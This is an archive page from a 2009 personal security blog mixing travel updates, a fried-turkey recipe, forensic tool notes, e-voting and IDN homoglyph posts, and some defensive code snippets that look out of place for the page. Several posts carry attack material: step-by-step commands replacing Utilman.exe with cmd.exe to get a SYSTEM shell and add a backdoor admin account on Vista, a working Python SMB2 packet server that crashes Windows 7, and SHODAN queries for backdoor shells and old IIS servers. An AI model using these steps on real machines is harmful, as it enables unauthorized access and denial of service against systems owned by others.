Monday, November 30, 2009

Moving Time.

Hi Folks,
today is my last day in DC! I really enjoyed DC: the city is wonderful and the working opportunities are huge. Even the weather is not so bad! Tomorrow morning I'll leave at 5 AM (trying to avoid DC traffic), destination Davis, CA. I'll try the old and classic road, Route 66. I hope my 2002 Ford Explorer will be "strong enough" to cross the Rocky Mountains!

So basically I'll read mail every evening from 7 PM to 9 PM. I probably won't be present on IM for 2 weeks, and it will probably be difficult for me to update my blog until December 15th.




Today my blog reached 280 visits per day from all around the world; that's a lot for me! So stay tuned, even if you won't read much news on my blog during these two weeks.


California's Click Per Day. November 30th, 9:40 AM

To all the Californian readers: I'll be back and I'd be glad to meet you somewhere in northern California. If you like the idea, please leave a comment below and I'll contact you soon!

Saturday, November 28, 2009

YouTube Video Spam

Hi Folks,
this morning I saw these fraudulent YouTube videos.


I had never thought about this kind of "spam" technique. While the user is watching his favorite music video, an advertisement pop-up appears on the screen saying: "to see more about your favorite singer click here". The user, especially during the first attacks, is tempted to click on, or copy and paste, the fraudulent link, which might point to any malicious site.

Here is another example:



If you want to try it yourself, the YouTube search terms are:
Adam Lambert AMA kiss
Ortiz vs. Griffin

Friday, November 27, 2009

RunAlyzer.

Hi Folks,
as you know I'm not a Windows user, but when I find something interesting on the "Windows side" (I usually say "Windows side" for Windows users and "Mac side" for Mac users) I can't stop myself from writing something about it. During these days I've been involved in a forensic committee on some Windows machines. It was the first time that a guy showed me this amazing Windows forensic tool called RunAlyzer. Its "international" web site shows that the project is pretty well known in different countries (since there are a lot of different languages and testimonials), and it seems very well supported in terms of documentation, wiki and forums.



The software is very intuitive, even though it explores very technical details of the Windows OS. I personally found it very useful, since you can analyze and manage real-time processes, explore Windows registry keys, services, logs and much more. (Take a close look at the following image by clicking on it.)


Thursday, November 26, 2009

Happy Thanksgiving to you



Personally I love fried turkey! (Thanks FoodGeeks)

INGREDIENTS

4 to 5 gallons vegetable oil
1 (12-15 lb.) whole turkey, room temperature
Cayenne pepper (optional)

INSTRUCTIONS

1. Begin heating the oil in a 10-gallon pot over a very hot propane flame outdoors. Don't set the burner to its highest setting, as you may need to increase the heat after you've added the turkey. It will take about 20 minutes for the oil to heat.

2. Meanwhile, rinse the turkey well, pat it dry inside and out, and set it on end in a sink to drain.

3. When the oil reaches 375°F, pat the turkey dry again and sprinkle it with cayenne, if desired. If your cooker has a basket insert, place the turkey in the basket and set it over a baking sheet. If not, set an oven rack over a large baking sheet, place the turkey on it and take them outside to the cooker.

4. Check the temperature of the oil. When the oil reaches 390°F, carefully and slowly lower the basket with the turkey into the oil or lower it holding it by its legs or by a long heavy tool such as a clean fireplace poker inserted into its cavity. Be careful! Immediately check the oil temperature and adjust the flame so that the temperature does not dip below 340°F. You want to maintain the temperature at 365°F. As it cooks, occasionally move the bird around in the oil so that it does not scorch (the oil near the heat source will be hotter). Whole turkeys take only 3 to 4 minutes per pound to fry to perfection. Small ones, around 12 pounds, will take about 35 minutes. Large ones, around 15 pounds, will take about 1 hour. When it is done, the turkey will float to the surface with a perfectly crispy, brown skin. If you are unsure, you can test the meat for doneness at the hip joint or insert a meat thermometer into the breast; it should register 180°F.

5. Using the basket insert if there is one, or by again inserting a long heavy tool such as a clean fireplace poker into its cavity, carefully remove the turkey from the oil and hold it over the pot for a moment to allow any excess oil to drain back into the pot, then lay the bird on the oven rack. Allow it to rest for 20 minutes before carving.

Tuesday, November 24, 2009

SHODAN, The Best Computer Search Engine, Ever

Hi Folks,
this morning I discovered this amazing Computer Search Engine: SHODAN



SHODAN lets you find servers/ routers/ etc. by using the simple search bar up above. Most of the data in the index covers web servers at the moment, but there is some data on FTP, Telnet and SSH services as well. Let me know which services interest you the most and I'll prioritize them in my scanning.

Let's say you want to find servers running the 'Apache' web daemon. A simple attempt would be to use:

apache

How about finding only apache servers running version 2.2.3?

apache 2.2.3

You can also narrow down the results using the following search parameters:

country:2-letter country code
hostname:full or partial host name
net:IP range using CIDR notation (ex: 18.7.7.0/24 )
port:21, 22, 23 or 80


For example: get all web (port:80) hosts running 'apache' in Switzerland (country:CH) that also have '.ch' in any of their domain names:

apache country:CH port:80 hostname:.ch

Just for the sake of the hackers, let's try some examples:

1) List of backdoor shell (try-it)
2) Bad Telnet Services (try-it)
3) List of old IIS 4.0, very bad... (try-it)

Now, I strongly believe that in the next few days a lot of systems will be compromised. With this service attackers will find random vulnerable services/servers; that is manna for script kiddies.
One question comes up: will it change the attack paradigm? At the beginning of the history of attacks, attackers hit a target only for particular reasons such as politics, personal motives, money and so forth. Now attackers may want to attack some targets only because they are vulnerable to something, without any true reason, only for the sake of attacking something. This will be a huge paradigm shift.
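The same filter syntax the post walks through (free-text banner terms plus country:, hostname:, net: and port:) can be run over your own asset inventory to see which of your hosts such a query would surface. This is an added example, not code from the post or from SHODAN; the inventory records and their values are constructed, and the matching rules are my reading of the filters listed above.

```python
import ipaddress

# Constructed inventory in the shape of what a Shodan-style index stores:
# one record per (host, port) with country, hostname and the raw banner.
# All addresses and names here are made up for the example.
INVENTORY = [
    {"ip": "192.0.2.10", "port": 80, "country": "CH", "hostname": "www.example.ch",
     "banner": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.3 (Unix)\r\n"},
    {"ip": "192.0.2.11", "port": 21, "country": "CH", "hostname": "ftp.example.ch",
     "banner": "220 ProFTPD 1.3.1 Server ready.\r\n"},
    {"ip": "198.51.100.5", "port": 80, "country": "US", "hostname": "web.example.com",
     "banner": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.3 (Win32)\r\n"},
    {"ip": "203.0.113.7", "port": 23, "country": "DE", "hostname": "router.example.de",
     "banner": "Login: "},
]

FILTERS = ("country", "hostname", "net", "port")


def parse_query(query):
    """Split "apache 2.2.3 country:CH port:80 hostname:.ch" into free-text
    banner terms and a dict of filter key/value pairs."""
    terms, filters = [], {}
    for token in query.split():
        key, sep, value = token.partition(":")
        if sep and key in FILTERS:
            filters[key] = value
        else:
            terms.append(token.lower())
    return terms, filters


def matches(record, terms, filters):
    """True if every free-text term occurs in the banner and every filter holds."""
    banner = record["banner"].lower()
    if not all(term in banner for term in terms):
        return False
    if "country" in filters and record["country"].upper() != filters["country"].upper():
        return False
    if "hostname" in filters and filters["hostname"].lower() not in record["hostname"].lower():
        return False
    if "port" in filters and record["port"] != int(filters["port"]):
        return False
    if "net" in filters:  # CIDR match, e.g. net:192.0.2.0/24
        network = ipaddress.ip_network(filters["net"], strict=False)
        if ipaddress.ip_address(record["ip"]) not in network:
            return False
    return True


def search(query, inventory=INVENTORY):
    """Return the IPs of inventory records matching a Shodan-style query string."""
    terms, filters = parse_query(query)
    return [r["ip"] for r in inventory if matches(r, terms, filters)]


if __name__ == "__main__":
    for q in ("apache", "apache country:CH port:80 hostname:.ch", "net:192.0.2.0/24 port:21"):
        print("%-40s -> %s" % (q, search(q)))
```

Point it at an export of your own scan data instead of INVENTORY to find exposures before someone else's query does.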

Sunday, November 22, 2009

Definitely Polymorphic Malware.

Hi folks, let me say two more words about the previous code.
I strongly believe that the discussed code, at the beginning of its life, followed the fastcall convention (1). As you can see, the first parameters are put directly into CPU registers and after that saved onto the stack (2); this is the classic fastcall behavior.



Due to polymorphism, the code is able to change itself. One of the first basic techniques is to change registers and save locations, as shown in (2). Basically we are looking at a polymorphic and evolved (meaning: "not the original") malware.

Friday, November 20, 2009

The First Time Against Calling Conventions

This morning I was fascinated by a function with a non-standard "calling convention". Usually I play with cdecl (the C calling convention) and stdcall (the Microsoft standard calling convention), and from time to time I've also exploited some fastcall (fast calling convention), but I've never seen something like this:


arg_0 = dword ptr 8           ; format string, passed on the stack
arg_4 = byte ptr 0Ch          ; first variadic argument, also on the stack
push ebp
mov ebp, esp                  ; standard frame setup
mov ecx, [ebp+arg_0]          ; ecx = format string
lea eax, [ebp+arg_4]          ; eax = address of the variadic arguments (the va_list)
push eax ; va_list
push ecx ; char *             ; format
push esi ; size_t             ; buffer size, already in esi on entry
push edi ; char *             ; destination buffer, already in edi on entry
call __vsnprintf
add esp, 10h                  ; caller removes the four arguments: __vsnprintf is cdecl
mov byte ptr [edi+esi-1], 0   ; force a NUL at the last byte of the buffer, even on truncation
pop ebp
retn

Variables in eax, ecx, esi and edi? What kind of convention is this?

Thursday, November 19, 2009

Top 5 Social Engineering Techniques

Hello folks,
today I just want to share this nice article from PCWorld about the top 5 social engineering techniques. Take a look and see if your company is vulnerable too.



Social Engineering: "There's no patch to human ingenuity ... ".

Wednesday, November 18, 2009

CAINE 1.5 released

Hi folks,
this is one of my favorite forensic distributions; it's called CAINE. Today it has been updated to version 1.5.



Main features:
WinTaylor 1.5, forensic frontend for Windows environment
CHANGELOG CAINE 1.5
Kernel 2.6-24.25 updated.
ADDED:
lnk_parse
lnk.sh
mork
steghide
UserAssist
dos2unix
chntpw
tkdiff
xdeview
md5deep,foremost updated
launchers fixed
manual updated
README.txt in the bash scripts directory
Photorec and Testdisk and XSteg in the Forensics menu
Window list and Show Desktop added.
------------------------------------------------
Windows Side:
Wintaylor updated
HexEdit added
Regmon updated
FTKImager updated
Index.html fixed
Photorec
Testdisk
Nigilant32
UsbWriteProtect

CAINE is one of the most intuitive live distros for forensic analysis; I suggest it to everybody who's new to the topic. It's easy to learn forensic analysis through this tool.

Wikipedia Toolbar CSC Vulnerability



That's interesting. I don't mean the vulnerability per se, but the Wikipedia toolbar, which is widely used. Here is the full description.

Monday, November 16, 2009

Somewhere in Delaware



The new security paradigm, or the prototype of Apple's new patent (camera behind the monitor)?

Saturday, November 14, 2009

Gain Vista Administrator's Privilege

Hi folks, today I want to point out one of the many ways to gain access to Vista boxes. Thanks to some mailing list friends.
This way is clearly faster than brute forcing and boot-replacing passwords.


Boot into Backtrack and open a shell prompt:
cd /mnt (change directory to mounted drives)
ls (get the list of mounted drives)
cd sda1 (sda1 is the main hard drive)
cd Windows/ (change to the windows directory)
cd System32/ (change to the system directory)
mv Utilman.exe Utilman.old (backup original file)
cp cmd.exe Utilman.exe (copy cmd.exe as utilman.exe)
reboot.
Once rebooted, at vista logon screen, Press Windows key + U
To invoke Utility Manager ( A.K.A. CMD.exe)
Cmd.exe will spawn with ‘System’ privileges.
c:\>net user S00perAdmin mypassword /add
c:\>net localgroup administrators S00perAdmin /add
Reboot and log in with your newly added Admin account

The Science News Cycle

It's so true !



Via PHD Comics

Thursday, November 12, 2009

TLS and Authentication Issues.

Yesterday, during Veterans Day, I spent my morning understanding the TLS attack described here



I suggest these readings to all of you. I know it's not very "new", but it's still incredible to realize that there are still protocol issues, even if the protocol is old and well tested.

Wednesday, November 11, 2009

Windows 7: The most Secure OS ...

Directly from Microsoft TechNET

Built upon the security foundation of Windows Vista, Windows 7 introduces a number of security enhancements to give users the confidence that Microsoft is continuing to find better ways to safeguard users’ IT investments as well as data. Businesses will benefit from enhancements that help protect company sensitive information, that provide stronger protections against malware, and that help secure access to corporate resources and data. End users can enjoy the benefits of computers and the Internet knowing that Windows 7 is using new technologies and features to safeguard privacy and personal information. Finally, all users will benefit from the flexible security configuration options in Windows 7—options that will help users achieve the unique balance of security and usability to meet their specific needs.





Today Laurent Gaffié described a very easy trick to crash the system. The bug triggers an infinite loop in smb{1,2}, pre-auth, no credentials needed. Basically:
netbios_header = struct.pack(">i", len(''.join(SMB_packet))) + SMB_packet
(The NetBIOS header provides the length of the incoming smb{1,2} packet.)
If the length in netbios_header is 4 bytes or more smaller than SMB_packet, it just blows up!
Here is the small script against the giant Microsoft Windows 7:
import SocketServer

# The string pieces must be concatenated into one packet: the first 4 bytes are
# the NetBIOS session header, the rest is the SMB2 packet.
packet = ("\x00\x00\x00\x9a"  # ---> length should be 9e not 9a..
          "\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
          "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
          "\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
          "\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
          "\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
          "\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
          "\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

    def handle(self):
        # Answer whatever the client sends with the malformed packet, then hang up.
        print "Who:", self.client_address
        print "THANKS SDL"
        input = self.request.recv(1024)
        self.request.send(packet)
        self.request.close()

launch = SocketServer.TCPServer(('', 445), SMB2)  # listen on all interfaces, port 445
launch.serve_forever()

If you are interested in more details, please visit Laurent's blog.
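The whole bug is a disagreement between the NetBIOS session header and the SMB bytes behind it, so the defensive counterpart is a consistency check you can run in a sensor or a test harness. This is an added example, not Laurent's code or the post's script; the sample SMB2 bytes are constructed padding with the same 0x9e total as the packet above, and the verdict names are my own.

```python
import struct

NBSS_HEADER_LEN = 4  # NetBIOS session header: one zero byte + 24-bit big-endian length


def build_netbios_frame(smb_packet):
    """Prepend a correct NetBIOS header (what a well-behaved sender does).
    struct.pack(">i", n) is fine because n must fit in 24 bits anyway."""
    if len(smb_packet) >= 1 << 24:
        raise ValueError("SMB packet too large for a 24-bit NetBIOS length")
    return struct.pack(">i", len(smb_packet)) + smb_packet


def check_netbios_frame(frame):
    """Compare the advertised length with the bytes actually present.
    Returns (advertised, actual, verdict): 'ok', 'short' (more data still
    expected on the stream) or 'inconsistent' (the header claims fewer bytes
    than the SMB packet carries, the malformed shape the crash relies on)."""
    if len(frame) < NBSS_HEADER_LEN:
        return None, len(frame), "short"
    (advertised,) = struct.unpack(">I", frame[:NBSS_HEADER_LEN])
    advertised &= 0x00FFFFFF  # the top byte of the header is not part of the length
    actual = len(frame) - NBSS_HEADER_LEN
    if advertised == actual:
        return advertised, actual, "ok"
    if advertised > actual:
        return advertised, actual, "short"
    return advertised, actual, "inconsistent"


# Constructed sample: a 64-byte SMB2 header (\xfeSMB, header size 0x40) plus 94
# bytes of zero padding = 158 bytes = 0x9e, like the post's packet. Not a real response.
SAMPLE_SMB2 = b"\xfeSMB" + b"\x40\x00" + b"\x00" * 58 + b"\x00" * 94

GOOD_FRAME = build_netbios_frame(SAMPLE_SMB2)                        # header says 0x9e
MALFORMED_FRAME = struct.pack(">i", len(SAMPLE_SMB2) - 4) + SAMPLE_SMB2  # header says 0x9a

if __name__ == "__main__":
    for name, frame in (("good", GOOD_FRAME), ("malformed", MALFORMED_FRAME)):
        print(name, check_netbios_frame(frame))
```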

Tuesday, November 10, 2009

Microsoft MiniFuzzer

Microsoft SDL team releases two security verification tools as FREE DOWNLOADS
BinScope Binary Analyzer integrates directly into the Visual Studio 2008 IDE. MiniFuzz File Fuzzer is a Visual Studio 2008 add-in. Both tools provide easy integration with TFS 2008 and the SDL Process Template for VSTS 2008! Both of them are available here.
MiniFuzz File Fuzzer.
MiniFuzz is a basic testing tool designed to help detect code flaws that may expose security vulnerabilities in file-handling code. This tool creates multiple random variations of file content and feeds it to the application to exercise the code in an attempt to expose unexpected application behaviors.

Because fuzzing is effective at finding bugs, it is a required activity in the Verification Phase of the Microsoft Security Development Lifecycle (SDL). With the release of MiniFuzz, we have made a simple file fuzzer available to assist developer efforts to find and address more bugs in code before it ships to customers.
BinScope Binary Analyzer.
The BinScope Binary Analyzer is a Microsoft verification tool that analyzes binaries to ensure that they have been built in compliance with Microsoft’s Security Development Lifecycle (SDL) requirements and recommendations. BinScope checks that SDL-required compiler/linker flags are being set, strong-named assemblies are in use, and up-to-date build tools are in place.

BinScope also reports on dangerous constructs that are prohibited or discouraged by the SDL (e.g. read/write shared sections and global function pointers). For a more detailed enumeration of the checks performed by BinScope, please see the BinScope documentation. BinScope is available in two forms: as a standalone executable and as a Visual Studio add-on.

UPDATE: Here is a first impression. Take a look.

Monday, November 9, 2009

Why Prof. Chaum's Machines Don't Work in California

Maryland tested the new verifiable voting system designed by David Chaum and his team. I haven't seen logs and comments about it so far, but I believe everything went fine. Immediately after the news my thought was: why don't we try the system in a bigger contest, like, for example, California? Compared with the current test, I believe that a wider range of people would prove higher reliability and provide many more test cases (I know that it is a pretty new system, but I also know that it has been studied for a while) to stress the system.



Even though I've been living in the US for two years, I still forget that each state has its own laws. Thanks to my friend and colleague Sean, I finally understood why Scantegrity cannot be used in California.

These are the two main legal issues:
13204. (a) "All distinguishing marks or erasures are forbidden and
make the ballot void."

and

14287. "No voter shall place any mark upon a ballot that will make
that ballot identifiable."

Here are the official voting codes: Voting Machine dir. (Section 13280-13289), Election Code dir. (13200-13220) and some exceptions (Section 13230-13233).

For people who don't know how Scantegrity works, here is a nice graphical summary.



As you see in the figure above, people have to mark the ballot ("What Voter Leaves in the Ballot Box") and people can keep a voting proof (A: "What Voter Takes Home").

Sunday, November 8, 2009

Thank you xkcd!

I often enjoy the xkcd comics, but this one is super!



via xkcd

Friday, November 6, 2009

Maryland Tested New Electronic Voting System

From Wired.




On Tuesday voters in Takoma Park, Maryland, got to try out a new, transparent voting system that lets voters go online to verify that their ballots got counted in the final tally. The system also lets anyone independently audit election results to verify the votes went to the correct candidates.

The open source, optical-scan system, called Scantegrity, was developed by cryptographer David Chaum, with researchers from MIT, the University of Maryland - Baltimore County, George Washington University, the University of Ottawa and the University of Waterloo. It’s similar to another system, called Punchscan, that won the researchers $10,000 in 2007 at a voting machine competition sponsored by the National Science Foundation.


I'm looking forward to seeing the new logs!

Tuesday, November 3, 2009

iPhone Hostage. 5 Bucks for Releasing.

What happens if you forget to change your iPhone SSH password and you're using GPRS or 3G? Of course, you'll be hacked.



It appears one enterprising Dutch hacker used port scanning to identify jailbroken iPhones on T-mobile Netherlands with SSH running. Enabling SSH is a common procedure for jailbroken iPhones, allowing a user to log in via Terminal and run standard UNIX commands. Unfortunately, iPhones all have a default root password that many forget to change after jailbreaking, leaving their phone as vulnerable as a Lamborghini parked on a public street with the windows down, the doors unlocked, and the keys in the ignition.


Read more here.

ICANN Approves Non Latin Character Domains

This is absolutely true: ICANN said "Yes" to Unicode DNS domains.



It's hard to judge. On one hand we get a more international "world wide web":


Let's face it; millions of Internet users speak languages that aren't written using Roman characters. Allowing Web sites to have domains that use other characters will make Web addresses more recognizable to some and make the Web more accessible to millions of new users.
The transition will begin on November 16 when countries can apply for country codes in their own unique character sets.
"The first countries that participate will not only be providing valuable information of the operation of IDNs in the domain name system, they are also going to help to bring the first of billions more people online -- people who never use Roman characters in their daily lives," ICANN CEO and President Rod Beckstrom said in a statement.


But on the other hand we have some obvious security problems:



Expanding beyond Roman characters also increases potential for site rip-offs that use homoglyphs, characters with identical or indistinguishable shapes. This already occurs to some degree (for instance pointing your browser to google.com takes you to a different site than go0gle.com) but different languages might have characters that are identical to characters in other languages.



If you're interested, follow the Google thread here, and find some more reading about it here, here and here.
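The homoglyph problem quoted above has a simple first-line check: look at the script each letter of a label belongs to, at what the label becomes in punycode (the form the DNS actually resolves), and at the ASCII digit-for-letter trick of go0gle.com. This is an added example, not code from the post or from ICANN; the lookalike table and the "suspicious" rule are my own heuristics, and the sample domains are constructed (the Cyrillic ones do not refer to real registrations).

```python
import unicodedata

# ASCII digits commonly used to imitate letters, as in the go0gle.com example.
# Heuristic table, assumed for this example.
ASCII_LOOKALIKES = {"0": "o", "1": "l", "3": "e", "5": "s"}


def script_of(ch):
    """Script name ('LATIN', 'CYRILLIC', 'GREEK', ...) taken from the Unicode
    character name; None for digits, hyphens and other non-letters."""
    if not ch.isalpha():
        return None
    try:
        return unicodedata.name(ch).split()[0]
    except ValueError:
        return "UNKNOWN"


def analyze_label(label):
    """Inspect one DNS label (the text between dots) and return the findings."""
    scripts = {script_of(ch) for ch in label} - {None}
    has_letters = any(ch.isalpha() for ch in label)
    findings = {
        "label": label,
        "scripts": sorted(scripts),
        "mixed_script": len(scripts) > 1,                    # e.g. Latin + Cyrillic
        "punycode": label.encode("idna").decode("ascii"),    # what the resolver sees
        # digits only count as lookalikes when they sit among letters
        "digit_lookalikes": [ch for ch in label if ch in ASCII_LOOKALIKES] if has_letters else [],
    }
    findings["suspicious"] = findings["mixed_script"] or bool(findings["digit_lookalikes"])
    return findings


def analyze_domain(domain):
    """Per-label findings for a whole domain name."""
    return [analyze_label(label) for label in domain.split(".") if label]


def is_suspicious(domain):
    return any(f["suspicious"] for f in analyze_domain(domain))


if __name__ == "__main__":
    # Constructed samples: all-Latin, Latin mixed with CYRILLIC SMALL LETTER O,
    # and the ASCII digit trick from the post.
    for d in ("google.com", "g\u043e\u043egle.com", "go0gle.com"):
        for f in analyze_domain(d):
            print(f["label"], f["punycode"], f["scripts"], "suspicious" if f["suspicious"] else "ok")
```

A mixed-script label is not always malicious (some languages legitimately mix scripts), so treat the flag as a reason to look at the punycode form, not as a verdict.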